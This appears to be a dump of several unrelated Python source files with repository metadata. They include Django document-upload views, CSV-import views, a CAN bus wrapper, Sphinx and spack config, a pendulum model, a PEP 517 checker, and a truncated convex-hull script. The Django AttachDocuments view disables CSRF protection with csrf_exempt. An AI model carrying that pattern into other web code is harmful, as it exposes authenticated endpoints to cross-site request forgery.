c64312ddb70ba8f8ce87635a4cfec0eb6299ba71 | 6,658 | py | Python | exporter/applications/views/documents.py | django-doctor/lite-frontend | 330ff9575fd22d7c4c42698ac2d653244e6180d6 | [
"MIT"
] | null | null | null | exporter/applications/views/documents.py | django-doctor/lite-frontend | 330ff9575fd22d7c4c42698ac2d653244e6180d6 | [
"MIT"
] | null | null | null | exporter/applications/views/documents.py | django-doctor/lite-frontend | 330ff9575fd22d7c4c42698ac2d653244e6180d6 | [
"MIT"
] | null | null | null | import logging
from http import HTTPStatus
from inspect import signature
from django.conf import settings
from django.shortcuts import redirect
from django.urls import reverse, NoReverseMatch
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django.views.generic import TemplateView
from s3chunkuploader.file_handler import s3_client, S3FileUploadHandler
from caseworker.cases.services import get_document
from exporter.applications.forms.documents import attach_document_form, delete_document_confirmation_form
from exporter.applications.helpers.check_your_answers import is_application_export_type_permanent
from exporter.applications.helpers.reverse_documents import document_switch
from exporter.applications.services import add_document_data, download_document_from_s3, get_application
from lite_content.lite_exporter_frontend import strings
from lite_forms.generators import form_page, error_page
from core.auth.views import LoginRequiredMixin
def get_upload_page(path, draft_id, is_permanent_application=False):
    """Build the attach-document form for the section matching *path*.

    The upload is mandatory for the end-user section of a standard
    permanent application; otherwise the section's own setting applies.
    """
    config = document_switch(path=path)
    mandatory = "/end-user" in path and is_permanent_application
    return attach_document_form(
        application_id=draft_id,
        strings=config["strings"],
        back_link=config["homepage"],
        is_optional=config["optional"] and not mandatory,
    )
def get_homepage(request, draft_id, obj_pk=None):
    """Redirect back to the homepage view of the current document section."""
    kwargs = {"pk": draft_id}
    if obj_pk:
        kwargs["obj_pk"] = obj_pk
    try:
        url = reverse(document_switch(request.path)["homepage"], kwargs=kwargs)
    except NoReverseMatch:
        # Some homepage routes only accept the application pk.
        url = reverse(document_switch(request.path)["homepage"], kwargs={"pk": draft_id})
    return redirect(url)
def get_delete_confirmation_page(path, pk):
    """Build the delete-confirmation form for the section matching *path*."""
    config = document_switch(path)
    return delete_document_confirmation_form(
        overview_url=reverse(config["homepage"], kwargs={"pk": pk}),
        strings=config["strings"],
    )
@method_decorator(csrf_exempt, "dispatch")
class AttachDocuments(LoginRequiredMixin, TemplateView):
    """Upload a document for an application section (end user, consignee, etc.)."""

    def get(self, request, **kwargs):
        # Render the attach-document form for this section.
        draft_id = str(kwargs["pk"])
        form = get_upload_page(request.path, draft_id)
        return form_page(request, form, extra_data={"draft_id": draft_id})

    @csrf_exempt
    def post(self, request, **kwargs):
        # Receive the uploaded file and hand it to the section's attach service.
        draft_id = str(kwargs["pk"])
        application = get_application(request, draft_id)
        is_permanent_application = is_application_export_type_permanent(application)
        form = get_upload_page(request.path, draft_id, is_permanent_application=is_permanent_application)
        try:
            # The S3 chunk-upload handler is installed before request.FILES
            # is first accessed, so the upload streams through it.
            request.upload_handlers.insert(0, S3FileUploadHandler(request))
            files = request.FILES
        except Exception:  # noqa
            return error_page(request, strings.applications.AttachDocumentPage.UPLOAD_FAILURE_ERROR)
        # Only validate documents if there are any present or are mandatory in the following cases:
        # standard permanent application end user section, additional documents section
        if (
            files
            or ("/end-user" in request.path and is_application_export_type_permanent(application))
            or "additional-document" in request.path
        ):
            logging.info(self.request)
            data, error = add_document_data(request)
            if error:
                return form_page(request, form, extra_data={"draft_id": draft_id}, errors={"documents": [error]})
            # Attach services differ in arity: some also need the sub-object pk.
            action = document_switch(request.path)["attach"]
            if len(signature(action).parameters) == 3:
                _, status_code = action(request, draft_id, data)
                if status_code == HTTPStatus.CREATED:
                    return get_homepage(request, draft_id)
            else:
                _, status_code = action(request, draft_id, kwargs["obj_pk"], data)
                if status_code == HTTPStatus.CREATED:
                    return get_homepage(request, draft_id, kwargs["obj_pk"])
            # Anything other than 201 Created is reported as an upload failure.
            return error_page(request, strings.applications.AttachDocumentPage.UPLOAD_FAILURE_ERROR)
        return get_homepage(request, draft_id)
class DownloadDocument(LoginRequiredMixin, TemplateView):
    """Stream a previously uploaded document back to the exporter."""

    def get(self, request, **kwargs):
        draft_id = str(kwargs["pk"])
        download = document_switch(request.path)["download"]
        # Download services differ in arity: some also need the sub-object pk.
        if len(signature(download).parameters) == 2:
            response, _ = download(request, draft_id)
        else:
            response, _ = download(request, draft_id, kwargs["obj_pk"])
        doc = response["document"]
        if not doc["safe"]:
            # Refuse to serve anything not marked safe (e.g. failed AV scan).
            return error_page(request, strings.applications.AttachDocumentPage.DOWNLOAD_GENERIC_ERROR)
        return download_document_from_s3(doc["s3_key"], doc["name"])
class DownloadGeneratedDocument(LoginRequiredMixin, TemplateView):
    """Redirect to a short-lived signed S3 URL for a generated case document."""

    def get(self, request, case_pk, document_pk):
        document, _ = get_document(request, pk=document_pk)
        s3_key = document["document"]["s3_key"]
        # Short expiry so the link cannot usefully be shared.
        signed_url = s3_client().generate_presigned_url(
            "get_object",
            Params={"Bucket": settings.AWS_STORAGE_BUCKET_NAME, "Key": s3_key,},
            ExpiresIn=15,
        )
        return redirect(signed_url)
class DeleteDocument(LoginRequiredMixin, TemplateView):
    """Confirmation flow for removing a document from an application."""

    def get(self, request, **kwargs):
        return form_page(request, get_delete_confirmation_page(request.path, str(kwargs["pk"])))

    def post(self, request, **kwargs):
        draft_id = str(kwargs["pk"])
        choice = request.POST.get("delete_document_confirmation")
        if choice is None:
            # Nothing selected: redisplay the confirmation form with an error.
            return form_page(
                request,
                get_delete_confirmation_page(request.path, str(kwargs["pk"])),
                errors={"delete_document_confirmation": ["Select yes to confirm you want to delete the document"]},
            )
        if choice != "yes":
            return get_homepage(request, draft_id)
        # Delete services differ in arity: some also need the sub-object pk.
        delete = document_switch(request.path)["delete"]
        if len(signature(delete).parameters) == 2:
            status_code = delete(request, draft_id)
        else:
            status_code = delete(request, draft_id, kwargs["obj_pk"])
        if status_code == HTTPStatus.NO_CONTENT:
            return get_homepage(request, draft_id)
        return error_page(request, strings.applications.DeleteDocument.DOCUMENT_DELETE_GENERIC_ERROR)
| 41.874214 | 120 | 0.685041 |
91a3ebe530010eb3dd73eaf919e939326ee87612 | 3,633 | py | Python | hordak/views/statement_csv_import.py | audience-platform/django-hordak | aa3a18438136a020794b1c0b10603dd78fa7aa76 | [
"MIT"
] | 187 | 2016-12-12T10:58:11.000Z | 2022-03-27T08:14:19.000Z | hordak/views/statement_csv_import.py | audience-platform/django-hordak | aa3a18438136a020794b1c0b10603dd78fa7aa76 | [
"MIT"
] | 62 | 2016-12-10T00:12:47.000Z | 2022-03-16T09:23:05.000Z | hordak/views/statement_csv_import.py | audience-platform/django-hordak | aa3a18438136a020794b1c0b10603dd78fa7aa76 | [
"MIT"
] | 47 | 2016-12-12T11:07:31.000Z | 2022-03-15T20:30:07.000Z | from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.views.generic import CreateView, UpdateView, DetailView
from hordak.forms.statement_csv_import import (
TransactionCsvImportForm,
TransactionCsvImportColumnFormSet,
)
from hordak.models import TransactionCsvImport
from hordak.resources import StatementLineResource
class CreateImportView(LoginRequiredMixin, CreateView):
    """Upload a CSV file to start a new statement import."""

    model = TransactionCsvImport
    form_class = TransactionCsvImportForm
    template_name = "hordak/statement_import/import_create.html"

    def get_success_url(self):
        # Continue to the column-mapping step for the newly created import.
        return reverse("hordak:import_setup", args=[self.object.uuid])
class SetupImportView(LoginRequiredMixin, UpdateView):
    """View for setting up of the import process

    This involves mapping columns to import fields, and collecting
    the date format
    """

    context_object_name = "transaction_import"
    slug_url_kwarg = "uuid"
    slug_field = "uuid"
    model = TransactionCsvImport
    fields = ("date_format",)
    template_name = "hordak/statement_import/import_setup.html"

    def get_context_data(self, **kwargs):
        # Expose the per-column mapping formset alongside the main form.
        context = super(SetupImportView, self).get_context_data(**kwargs)
        context["formset"] = TransactionCsvImportColumnFormSet(instance=self.object)
        return context

    def post(self, request, *args, **kwargs):
        # Validate the date-format form and the column formset together;
        # both must pass before anything is saved.
        self.object = self.get_object()
        form = self.get_form_class()(request.POST, request.FILES, instance=self.object)
        formset = TransactionCsvImportColumnFormSet(request.POST, instance=self.object)
        if form.is_valid() and formset.is_valid():
            return self.form_valid(form, formset)
        else:
            return self.form_invalid(form, formset)

    def form_valid(self, form, formset):
        # Save the parent first so the formset rows point at the saved instance.
        self.object = form.save()
        formset.instance = self.object
        formset.save()
        return HttpResponseRedirect(self.get_success_url())

    def form_invalid(self, form, formset):
        # Re-render the page with both the form and formset errors visible.
        return self.render_to_response(self.get_context_data(form=form, formset=formset))

    def get_success_url(self):
        return reverse("hordak:import_dry_run", args=[self.object.uuid])
class AbstractImportView(LoginRequiredMixin, DetailView):
    """Base view that runs the CSV import.

    Subclasses set ``dry_run`` (preview vs. commit) and ``template_name``.
    """

    context_object_name = "transaction_import"
    slug_url_kwarg = "uuid"
    slug_field = "uuid"
    model = TransactionCsvImport
    # Overridden by subclasses: True previews the import, False commits it.
    dry_run = True

    def get(self, request, **kwargs):
        return super(AbstractImportView, self).get(request, **kwargs)

    def post(self, request, **kwargs):
        # Run the import, keep the outcome on the instance, then re-render
        # the same page so the template can display the result.
        transaction_import = self.get_object()
        resource = StatementLineResource(
            date_format=transaction_import.date_format,
            statement_import=transaction_import.hordak_import,
        )
        self.result = resource.import_data(
            dataset=transaction_import.get_dataset(),
            dry_run=self.dry_run,
            use_transactions=True,
            collect_failed_rows=True,
        )
        return self.get(request, **kwargs)

    def get_context_data(self, **kwargs):
        # ``result`` only exists after a POST; plain GETs render with None.
        return super(AbstractImportView, self).get_context_data(
            result=getattr(self, "result", None), **kwargs
        )
class DryRunImportView(AbstractImportView):
    """Preview the CSV import without saving anything."""

    template_name = "hordak/statement_import/import_dry_run.html"
    dry_run = True
class ExecuteImportView(AbstractImportView):
    """Run the CSV import for real, committing the statement lines."""

    template_name = "hordak/statement_import/import_execute.html"
    dry_run = False
| 34.273585 | 89 | 0.720066 |
f1c6bea1422eca8375292d8b462f9486a26220db | 1,729 | py | Python | uds/uds_communications/TransportProtocols/Can/CanConnection.py | J3rome/python-uds | fe0f7a9505cb7b87f693ab736d713d7871dff288 | [
"MIT"
] | 62 | 2019-02-13T20:26:12.000Z | 2022-02-23T19:47:34.000Z | uds/uds_communications/TransportProtocols/Can/CanConnection.py | J3rome/python-uds | fe0f7a9505cb7b87f693ab736d713d7871dff288 | [
"MIT"
] | 58 | 2018-07-09T10:58:33.000Z | 2022-01-31T20:27:13.000Z | uds/uds_communications/TransportProtocols/Can/CanConnection.py | J3rome/python-uds | fe0f7a9505cb7b87f693ab736d713d7871dff288 | [
"MIT"
] | 33 | 2019-03-25T07:30:34.000Z | 2022-03-08T12:55:35.000Z | #!/usr/bin/env python
__author__ = "David Hayward"
__copyrights__ = "Copyright 2019, the python-uds project"
__credits__ = ["David Hayward"]
__license__ = "MIT"
__maintainer__ = "Richard Clubb"
__email__ = "richard.clubb@embeduk.com"
__status__ = "Development"
import can
class CanConnection(object):
    """Wrap a python-can Bus/Notifier/Listener trio so that several clients
    can share a single bus connection."""

    def __init__(self, callback, filter, bus):
        self.__bus = bus
        first_listener = self.__make_listener(callback)
        self.__notifier = can.Notifier(self.__bus, [first_listener], 0)
        self.__listeners = [first_listener]
        self.addFilter(filter)

    @staticmethod
    def __make_listener(callback):
        # A bare Listener whose message hook is replaced by the client callback.
        listener = can.Listener()
        listener.on_message_received = callback
        return listener

    def addCallback(self, callback):
        """Register an additional callback on this bus via a new listener."""
        listener = self.__make_listener(callback)
        self.__notifier.add_listener(listener)
        self.__listeners.append(listener)

    def addFilter(self, filter):
        """Add a CAN message id filter so matching frames reach the callbacks."""
        new_entry = {"can_id": filter, "can_mask": 0xFFF, "extended": False}
        current = self.__bus.filters
        if current is None:
            self.__bus.set_filters([new_entry])
        else:
            current.append(new_entry)
            self.__bus.set_filters(current)

    def transmit(self, data, reqId, extended=False):
        """Send *data* on the bus with arbitration id *reqId* (DLC fixed at 8)."""
        frame = can.Message(arbitration_id=reqId, extended_id=extended)
        frame.dlc = 8
        frame.data = data
        self.__bus.send(frame)
848dc4f670789138198f608f961f10b1f245ba77 | 448 | py | Python | lib/spack/spack/__init__.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2021-03-19T13:12:47.000Z | 2021-03-19T13:12:47.000Z | lib/spack/spack/__init__.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | lib/spack/spack/__init__.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
#: major, minor, patch version for Spack, in a tuple
spack_version_info = (0, 12, 0)
#: String containing Spack version joined with .'s
spack_version = '.'.join(str(v) for v in spack_version_info)
__all__ = ['spack_version_info', 'spack_version']
| 32 | 73 | 0.75 |
d36c1f411ca1b084e50c3a0cbd666161f971fb34 | 2,015 | py | Python | docs/source/conf.py | Waztom/fragalysis-backend | 1d7775740bc6d4cce3a846064fd57bb0fcdb8269 | [
"Apache-2.0"
] | 1 | 2021-02-09T03:27:24.000Z | 2021-02-09T03:27:24.000Z | docs/source/conf.py | Waztom/fragalysis-backend | 1d7775740bc6d4cce3a846064fd57bb0fcdb8269 | [
"Apache-2.0"
] | 128 | 2018-05-01T09:40:57.000Z | 2022-03-31T12:55:01.000Z | docs/source/conf.py | duncanpeacock/fragalysis-backend | 3684f1000d77ce291cdec6124c041b2570811d4c | [
"Apache-2.0"
] | 17 | 2018-03-20T17:42:04.000Z | 2022-02-02T11:42:39.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import sys
import os
import django

# Make the repository root importable and boot Django so autodoc can import
# modules that need settings/models at import time.
sys.path.insert(0, os.path.abspath('../..'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'fragalysis.settings'
django.setup()

# -- Project information -----------------------------------------------------

project = 'Fragalysis-Backend'
copyright = '2020, Rachael Skyner'
author = 'Rachael Skyner'

# -- General configuration ---------------------------------------------------

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.napoleon']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []

# -- Options for HTML output -------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Document that serves as the documentation root (index.rst).
master_doc = 'index'
| 34.152542 | 81 | 0.672953 |
088e7f546e802ab13c10a19ed5f8c7cbda30a152 | 1,894 | py | Python | pendulum.py | phantomm88/dynamical | be57466c03402b7eeff92b8d1c71a3c622309800 | [
"Apache-2.0"
] | null | null | null | pendulum.py | phantomm88/dynamical | be57466c03402b7eeff92b8d1c71a3c622309800 | [
"Apache-2.0"
] | null | null | null | pendulum.py | phantomm88/dynamical | be57466c03402b7eeff92b8d1c71a3c622309800 | [
"Apache-2.0"
] | null | null | null | # N-pendulum source file
import numpy as np
class Joint:
    """A pin joint / point mass in the pendulum, with applied forces."""

    def __init__(self, x, y, fix=False):
        self.x = x
        self.y = y
        self.forces = []      # applied forces
        self.fixValue = fix   # True if the joint is anchored
        self.beamCodes = []   # (beam id, k, rest length) tuples of attached beams

    def getX(self):
        return self.x

    def getY(self):
        return self.y

    def getForces(self):
        return self.forces

    def getFixValue(self):
        return self.fixValue

    def setFixValue(self, newFix):
        self.fixValue = newFix

    def setX(self, newX):
        self.x = newX

    def setY(self, newY):
        self.y = newY

    def getBeamCodes(self):
        return self.beamCodes

    def addBeamCode(self, code):
        self.beamCodes.append(code)

    def addForce(self, newForce):
        self.forces.append(newForce)

    def removeForce(self, index=None):
        """Remove the last force, or the force at ``index`` if given.

        Bug fix: the original referenced ``self.force`` (missing the final
        ``s``), which raised AttributeError on every call.
        """
        if index is None:
            self.forces.pop()
        else:
            self.forces.pop(index)

    def dist(self, joint2):
        """Euclidean distance between this joint and ``joint2``."""
        return np.sqrt((joint2.getX() - self.x)**2 + (joint2.getY() - self.y)**2)
class Beam:
    """A spring-like beam connecting two joints.

    ``joint1`` is the joint nearer the base; ``joint2`` is further away.
    """

    # joint1 and joint2 are linked, with joint2 being further away from base.
    def __init__(self, k, restLength):
        self.k, self.restLength = k, restLength
        # Populated by link().  Bug fix: the original never stored the joints,
        # so getJoint1()/getJoint2() raised AttributeError before setJointN().
        self.joint1 = None
        self.joint2 = None

    def link(self, joint1, joint2):
        """Attach the beam to two joints and apply the spring force to joint2."""
        self.joint1 = joint1
        self.joint2 = joint2
        joint1.addBeamCode((id(self), self.k, self.restLength))
        joint2.addBeamCode((id(self), self.k, self.restLength))
        # Hooke's law: F = -k * (current length - rest length)
        joint2.addForce((-self.k * (joint1.dist(joint2) - self.restLength), id(self)))

    def getJoint1(self):
        return self.joint1

    def setJoint1(self, newJoint1):
        self.joint1 = newJoint1

    def getJoint2(self):
        return self.joint2

    def setJoint2(self, newJoint2):
        self.joint2 = newJoint2

    def getK(self):
        return self.k

    def setK(self, newK):
        self.k = newK
# Quick demo / smoke test: two joints connected by a single beam.
a = Joint(3, 4)
b = Joint(5, 10)
c = Beam(3, 10)
c.link(a, b)
| 29.59375 | 127 | 0.601373 |
c4bbcab7553e4dd761245b7d7d206cb2f3b4ac77 | 122 | py | Python | superhelp/displayers/cli_displayer.py | grantps/superhelp | d8e861bf1ad91571ac23b9c833a8cd461bb1952f | [
"MIT"
] | 27 | 2020-05-17T20:48:43.000Z | 2022-01-08T21:32:30.000Z | superhelp/displayers/cli_displayer.py | grantps/superhelp | d8e861bf1ad91571ac23b9c833a8cd461bb1952f | [
"MIT"
] | null | null | null | superhelp/displayers/cli_displayer.py | grantps/superhelp | d8e861bf1ad91571ac23b9c833a8cd461bb1952f | [
"MIT"
] | null | null | null | """
LOL - a bit underwhelming in the case of CLI output.
"""
def display(formatted_help: str) -> None:
    """Write the pre-formatted help text to standard output."""
    print(formatted_help)
| 17.428571 | 52 | 0.704918 |
164d08ce3ee2a82a474371752e92461bdcf36142 | 5,749 | py | Python | pep517/check.py | uranusjr/pep517 | 5d25cfdf3caecd0e3c87d3b9788a891306df58e0 | [
"MIT"
] | null | null | null | pep517/check.py | uranusjr/pep517 | 5d25cfdf3caecd0e3c87d3b9788a891306df58e0 | [
"MIT"
] | null | null | null | pep517/check.py | uranusjr/pep517 | 5d25cfdf3caecd0e3c87d3b9788a891306df58e0 | [
"MIT"
] | null | null | null | """Check a project and backend by attempting to build using PEP 517 hooks.
"""
import argparse
import logging
import os
from os.path import isfile, join as pjoin
from pytoml import TomlError, load as toml_load
import shutil
from subprocess import CalledProcessError
import sys
import tarfile
from tempfile import mkdtemp
import zipfile
from .colorlog import enable_colourful_output
from .envbuild import BuildEnvironment
from .wrappers import Pep517HookCaller
log = logging.getLogger(__name__)
def check_build_sdist(hooks):
    """Try to build an sdist via the PEP 517 hooks; return True on success.

    Installs the static build requirements into an isolated environment,
    asks the backend for its dynamic requirements, then calls
    ``build_sdist`` and sanity-checks the produced file.
    """
    with BuildEnvironment() as env:
        try:
            env.pip_install(hooks.build_sys_requires)
            log.info('Installed static build dependencies')
        except CalledProcessError:
            log.error('Failed to install static build dependencies')
            return False

        try:
            reqs = hooks.get_requires_for_build_sdist({})
            log.info('Got build requires: %s', reqs)
        except Exception:
            # Was a bare ``except:``; narrowed so KeyboardInterrupt/SystemExit
            # are not swallowed as a "check failure".
            log.error('Failure in get_requires_for_build_sdist', exc_info=True)
            return False

        try:
            env.pip_install(reqs)
            log.info('Installed dynamic build dependencies')
        except CalledProcessError:
            log.error('Failed to install dynamic build dependencies')
            return False

        td = mkdtemp()
        log.info('Trying to build sdist in %s', td)
        try:
            try:
                filename = hooks.build_sdist(td, {})
                log.info('build_sdist returned %r', filename)
            except Exception:  # was a bare except; see above
                log.info('Failure in build_sdist', exc_info=True)
                return False

            if not filename.endswith('.tar.gz'):
                log.error("Filename %s doesn't have .tar.gz extension", filename)
                return False

            path = pjoin(td, filename)
            if isfile(path):
                log.info("Output file %s exists", path)
            else:
                log.error("Output file %s does not exist", path)
                return False

            if tarfile.is_tarfile(path):
                log.info("Output file is a tar file")
            else:
                log.error("Output file is not a tar file")
                return False
        finally:
            # Always clean up the temp build directory, pass or fail.
            shutil.rmtree(td)

        return True
def check_build_wheel(hooks):
    """Try to build a wheel via the PEP 517 hooks; return True on success.

    Mirrors :func:`check_build_sdist`, but calls
    ``get_requires_for_build_wheel`` / ``build_wheel`` and checks for a
    ``.whl`` zip file.
    """
    with BuildEnvironment() as env:
        try:
            env.pip_install(hooks.build_sys_requires)
            log.info('Installed static build dependencies')
        except CalledProcessError:
            log.error('Failed to install static build dependencies')
            return False

        try:
            reqs = hooks.get_requires_for_build_wheel({})
            log.info('Got build requires: %s', reqs)
        except Exception:
            # Was a bare ``except:``; also fixes a copy-paste bug — the
            # message previously named get_requires_for_build_sdist.
            log.error('Failure in get_requires_for_build_wheel', exc_info=True)
            return False

        try:
            env.pip_install(reqs)
            log.info('Installed dynamic build dependencies')
        except CalledProcessError:
            log.error('Failed to install dynamic build dependencies')
            return False

        td = mkdtemp()
        log.info('Trying to build wheel in %s', td)
        try:
            try:
                filename = hooks.build_wheel(td, {})
                log.info('build_wheel returned %r', filename)
            except Exception:  # was a bare except; see above
                log.info('Failure in build_wheel', exc_info=True)
                return False

            if not filename.endswith('.whl'):
                log.error("Filename %s doesn't have .whl extension", filename)
                return False

            path = pjoin(td, filename)
            if isfile(path):
                log.info("Output file %s exists", path)
            else:
                log.error("Output file %s does not exist", path)
                return False

            if zipfile.is_zipfile(path):
                log.info("Output file is a zip file")
            else:
                log.error("Output file is not a zip file")
                return False
        finally:
            # Always clean up the temp build directory, pass or fail.
            shutil.rmtree(td)

        return True
def check(source_dir):
    """Validate a source tree: parse pyproject.toml, then attempt both builds."""
    pyproject = pjoin(source_dir, 'pyproject.toml')
    if not isfile(pyproject):
        log.error('Missing pyproject.toml')
        return False
    log.info('Found pyproject.toml')

    try:
        with open(pyproject) as f:
            pyproject_data = toml_load(f)
        # Ensure the mandatory data can be loaded
        buildsys = pyproject_data['build-system']
        requires = buildsys['requires']
        backend = buildsys['build-backend']
        log.info('Loaded pyproject.toml')
    except (TomlError, KeyError):
        log.error("Invalid pyproject.toml", exc_info=True)
        return False

    hooks = Pep517HookCaller(source_dir, backend)

    sdist_ok = check_build_sdist(hooks)
    wheel_ok = check_build_wheel(hooks)

    if not sdist_ok:
        log.warning('Sdist checks failed; scroll up to see')
    if not wheel_ok:
        log.warning('Wheel checks failed')

    # NOTE(review): only the sdist result decides the return value; wheel
    # failures are logged but do not fail the check — confirm intentional.
    return sdist_ok
def main(argv=None):
    """Command-line entry point: check the project in the given directory."""
    parser = argparse.ArgumentParser()
    parser.add_argument('source_dir',
                        help="A directory containing pyproject.toml")
    args = parser.parse_args(argv)

    enable_colourful_output()

    if check(args.source_dir):
        print(ansi('Checks passed', 'green'))
        return
    print(ansi('Checks failed', 'red'))
    sys.exit(1)
#: ANSI escape sequences used for coloured terminal output.
ansi_codes = {
    'reset': '\x1b[0m',
    'bold': '\x1b[1m',
    'red': '\x1b[31m',
    'green': '\x1b[32m',
}


def ansi(s, attr):
    """Wrap *s* in the ANSI code for *attr* when stdout supports colour.

    On Windows, or when stdout is not a tty (e.g. redirected to a file),
    the text is returned unstyled.
    """
    text = str(s)
    colour_ok = os.name != 'nt' and sys.stdout.isatty()
    if not colour_ok:
        return text
    return ansi_codes[attr] + text + ansi_codes['reset']
# Allow running this module directly as a script: ``python check.py <dir>``.
if __name__ == '__main__':
    main()
| 29.482051 | 81 | 0.586015 |
48baf003a0e2683ebc478c604abfd9fadb4ee4f0 | 10,632 | py | Python | image_MER/image_MER.py | WangHongshuo/Image_Algorithms | 67a4fd15d670f3f17e1a83123df28a740e821912 | [
"MIT"
] | 5 | 2020-03-22T14:50:54.000Z | 2021-11-18T09:27:15.000Z | image_MER/image_MER.py | WangHongshuo/Image_Algorithms | 67a4fd15d670f3f17e1a83123df28a740e821912 | [
"MIT"
] | null | null | null | image_MER/image_MER.py | WangHongshuo/Image_Algorithms | 67a4fd15d670f3f17e1a83123df28a740e821912 | [
"MIT"
] | 3 | 2019-04-05T19:43:39.000Z | 2020-10-06T10:49:31.000Z | import cv2 as cv
import numpy as np
import copy
import math
from collections import OrderedDict
class Point2:
    """A 2D point, also used as a 2D vector.

    Attributes:
        x: first coordinate (row index in image space).
        y: second coordinate (column index in image space).
    """

    def __init__(self, _x, _y):
        self.x = _x
        self.y = _y

    def __sub__(self, p):
        """Component-wise difference; returns a new Point2."""
        return Point2(self.x - p.x, self.y - p.y)

    def __str__(self):
        # Trailing space kept for compatibility with existing output.
        return "[{}, {}] ".format(self.x, self.y)

    def crossProduct(self, p):
        """Return the z-component of the 2D cross product self x p."""
        return self.x * p.y - self.y * p.x

    def dotProduct(self, p):
        """Return the dot product of self and p."""
        return self.x * p.x + self.y * p.y
class Rect2:
    """A rectangle described by its corner points plus cached metrics.

    Attributes:
        p: list of 4 corner points.
        minBorder: length of the shorter side.
        maxBorder: length of the longer side.
        area: rectangle area.
    """

    def __init__(self, _p, _minBorder, _maxBorder, _area):
        self.area = _area
        self.p = _p
        self.maxBorder = _maxBorder
        self.minBorder = _minBorder
class Border:
    """Edge information for a binary image region.

    Attributes:
        topLeft: top-left corner of the box enclosing all border points;
            (-1, -1) until computed.
        bottomRight: bottom-right corner of that box; (-1, -1) until computed.
        borderPoints: ordered mapping row index -> list of Point2 on that row.
    """

    def __init__(self):
        self.borderPoints = OrderedDict()
        self.topLeft = Point2(-1, -1)
        self.bottomRight = Point2(-1, -1)
def getBinaryImageBorder(src, mark):
    """Return an edge image derived from *src*.

    Interior pixels whose value and full 8-neighbourhood all equal *mark*
    are cleared to 0; every other pixel keeps its original value.  The
    outermost rows/columns are never modified.

    :param src: 2D image array
    :param mark: foreground grey level identifying the region
    :return: new image with only the region's border left at *mark*
    """
    borderImg = copy.deepcopy(src)
    rows = src.shape[0]
    cols = src.shape[1]
    # Offsets covering the pixel itself plus its 8 neighbours.
    window = ((-1, -1), (-1, 0), (-1, 1),
              (0, -1), (0, 0), (0, 1),
              (1, -1), (1, 0), (1, 1))
    for r in range(1, rows - 1):
        for c in range(1, cols - 1):
            # Reads go to the untouched src, so update order is irrelevant.
            if all(src[r + dr][c + dc] == mark for dr, dc in window):
                borderImg[r][c] = 0
    return borderImg
def getBorderInfo(src, mark):
    """Collect the pixels of an edge image equal to *mark* into a Border.

    Points are stored row by row (top to bottom) and, within a row, left
    to right, so ``borderPoints`` preserves raster-scan order.  The
    topLeft/bottomRight corners delimit the box enclosing all points.

    :param src: 2D edge image
    :param mark: grey level marking edge pixels
    :return: populated Border instance
    """
    info = Border()
    nrows = src.shape[0]
    ncols = src.shape[1]
    for r in range(nrows):
        for c in range(ncols):
            if src[r][c] == mark:
                info.borderPoints.setdefault(r, []).append(Point2(r, c))
    # x range: first and last rows that contain edge pixels.
    rows_present = list(info.borderPoints)
    info.topLeft.x = rows_present[0]
    info.bottomRight.x = rows_present[-1]
    # y range: within a row points are sorted left-to-right, so the min of
    # the first-point y's and the max of the last-point y's bound all points.
    info.topLeft.y = min(pts[0].y for pts in info.borderPoints.values())
    info.bottomRight.y = max(pts[-1].y for pts in info.borderPoints.values())
    return info
# @fn Compute the convex hull of the border point set
# @param borderInfo border information of the target region
# @return convex hull point list (first and last entries are the same point)
def getConvexHull(borderInfo):
    """Graham-like scan producing the convex hull of Border points.

    The scan runs twice over the rows (bottom-up using each row's
    rightmost point, then top-down using each row's leftmost point) and
    finally drops redundant points lying on the same horizontal line.
    """
    # Shallow reference to the row -> points mapping (no copy made).
    bP = borderInfo.borderPoints
    top = borderInfo.topLeft.x
    bottom = borderInfo.bottomRight.x
    # Start the Graham scan from the bottom row, in horizontal order.
    # The OpenCV coordinate system does not change the scan logic, so no
    # coordinate conversion is required.
    pStack = list()
    it = reversed(bP)
    key = next(it)
    pStack.append(bP[key][0])
    pStack.append(bP[key][-1])
    key = next(it)
    pStack.append(bP[key][-1])
    while(key != top):
        key = next(it)
        nextPoint = bP[key][-1]
        vec1 = pStack[-2] - pStack[-1]
        vec2 = nextPoint - pStack[-1]
        cP = vec1.crossProduct(vec2)
        # Pop while the turn is non-convex (positive cross product).
        while( cP > 0):
            pStack.pop(-1)
            vec1 = pStack[-2] - pStack[-1]
            vec2 = nextPoint - pStack[-1]
            cP = vec1.crossProduct(vec2)
        pStack.append(nextPoint)
    # Second pass: walk back down using each row's leftmost point.
    it = iter(bP)
    key = next(it)
    pStack.append(bP[key][0])
    while(key < bottom):
